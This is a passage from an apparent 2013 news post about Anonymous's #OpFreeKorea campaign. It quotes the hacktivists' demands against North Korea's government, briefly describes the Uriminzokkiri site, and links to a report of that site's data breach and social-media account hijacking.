anymore, we won't eat your shit anymore!!!
We demand:
- N.K. government to stop making nukes and nuke-threats
- Kim Jong-un to resign
- it's time to install a free direct democracy in North Korea
- uncensored internet access for all the citizens!

Brief About Uriminzokkiri: Uriminzokkiri ("Our Nation") is based in China, but publishes news and propaganda from North Korea's state media and is considered one of Pyongyang's primary online mouthpieces. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">(#OpFreeKorea) Anonymous Breached Uriminzokkiri, Stolen 15k User Data & Hijacked Twitter, Flickr Account "https://www.voiceofgreyhat.com/2013/04/OpFreeKorea-Anonymous-Breached-Uriminzokkiri.com.html</a>